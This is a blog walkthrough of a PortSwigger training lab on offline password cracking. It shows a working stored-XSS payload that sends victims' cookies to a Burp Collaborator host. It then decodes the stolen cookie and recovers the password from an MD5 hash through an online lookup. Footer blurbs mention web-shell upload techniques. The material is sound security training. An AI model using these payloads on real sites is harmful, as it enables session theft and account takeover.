On this page
apsyleg1 min read
#portswigger #authentication #web-security

Offline Password Cracking

Lab

Offline password cracking · Practitioner

Solution

Given

This lab stores the user's password hash in a cookie. The lab also contains an XSS vulnerability in the comment functionality. To solve the lab, obtain Carlos's stay-logged-in cookie and use it to crack his password. Then, log in as carlos and delete his account from the "My account" page.

Your credentials: wiener:peter
Victim's username: carlos

Analyzing the task

The user's password hash is stored in a cookie. Using XSS on the comments page we need to steal the stay-logged-in cookie and then crack the password.

Recon

We log in as wiener and tick the "Remember me" box.

Then we go to the first article and look at the comments. We drop payloads into the comment text field and the name field:

  • <>'"COZ1-COMMENT
  • <>'"COZ1-NAME

Comment submitted. We hit "Back". We look at the server response:

<section class="comment">
    <p>
        <img src="/resources/images/avatarDefault.svg" class="avatar">                            &lt;&gt;&apos;&quot;COZ1-NAME | 26 May 2026
    </p>
    <p><>'"COZ1-COMMENT</p>
    <p></p>
</section>

So the comment text field is vulnerable to XSS, but the name field isn't — <>'" get escaped there.

Let's drop <script>alert(25)</script> then. Works!

Now let's see what the stay-logged-in cookie looks like:

Set-Cookie: stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw; Expires=Wed, 01 Jan 3000 01:00:00 UTC
Set-Cookie: session=HYIyqq9WyhVgW2EBggmvYrFeFKNPkjHL; Secure; HttpOnly; SameSite=None

Good, no HttpOnly — we can steal it. What to do with it next — we'll figure out, maybe just look up this potential hash, the PortSwigger docs mentioned that approach.

What does the payload look like conceptually?

  1. Take document.cookie and send it to our server.

Let's grab a URL from Burp Collaborator:

awanmq3hu6caaaar36tu220suj0ao0cp.oastify.com

<script>fetch('https://awanmq3hu6caaaar36tu220suj0ao0cp.oastify.com/?c='+document.cookie)</script>

OK, got the victim's cookies:

GET /?c=secret=kMMSNa1CtoViZvGFdfkRGhrEmcaTkSLU;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz

We pull out the stay-logged-in value in Burp Suite. We get Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz.

carlos:26323c16d5f4dabff3bb136f2460a943

Looks like an MD5 hash, just like in the previous lab. Let's try to find the password for the MD5 hash 26323c16d5f4dabff3bb136f2460a943.

A dictionary attack, basically. Or some kind of hash database.

https://md5.gromweb.com/?md5=26323c16d5f4dabff3bb136f2460a943 There's a handy resource. Password — onceuponatime.

We log in as the user and delete the account.

Lab solved!

More in this category

Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)

.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.

Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)

Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.

Remote Code Execution via Web Shell Upload (PortSwigger Lab)

Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.